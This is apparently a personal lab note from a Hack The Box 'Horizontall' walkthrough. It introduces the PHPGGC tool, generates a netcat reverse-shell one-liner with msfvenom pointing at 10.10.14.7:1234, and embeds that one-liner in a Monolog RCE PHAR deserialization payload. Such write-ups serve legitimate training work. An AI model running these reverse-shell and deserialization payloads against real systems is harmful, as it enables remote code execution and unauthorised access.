InfoSec LAB

Horizontall_Payload

Created: 2 min read

PHPGGC: PHP Generic Gadget Chains

phpggc is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically. When encountering an unserialize on a website you don’t have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. It can be seen as the equivalent of frohoff’s ysoserial, but for PHP. Currently, the tool supports gadget chains such as: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework.

┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ git clone https://github.com/ambionics/phpggc.git                                                  
Cloning into 'phpggc'...
remote: Enumerating objects: 3539, done.
remote: Counting objects: 100% (1085/1085), done.
remote: Compressing objects: 100% (430/430), done.
remote: Total 3539 (delta 652), reused 916 (delta 595), pack-reused 2454
receiving objects: 100% (3539/3539), 511.20 KiB | 8.11 MiB/s, done.
resolving deltas: 100% (1524/1524), done.

I copied the repo to the current working directory.

┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ apt search phpggc
Sorting... Done
Full Text Search... Done
phpggc/kali-rolling,kali-rolling 0.20221219-0kali1 all
  Generate payloads that exploit unsafe object deserialization

It’s also available in the Official Kali’s apt repo

Payload Generation

┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.7 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 92 bytes
mkfifo /tmp/mbvop; nc 10.10.14.7 1234 0</tmp/mbvop | /bin/sh >/tmp/mbvop 2>&1; rm /tmp/mbvop

I will first generate a reverse shell command using msfvenom

┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ php -d'phar.readonly=0' phpggc/phpggc --phar phar -o ./payload.phar --fast-destruct monolog/rce1 system 'mkfifo /tmp/mbvop; nc 10.10.14.7 1234 0</tmp/mbvop | /bin/sh >/tmp/mbvop 2>&1; rm /tmp/mbvop'

I will then generate a PHAR payload with phpggc, containing the generated reverse shell above

All set.

Interactive Graph View

Backlinks

  • No backlinks found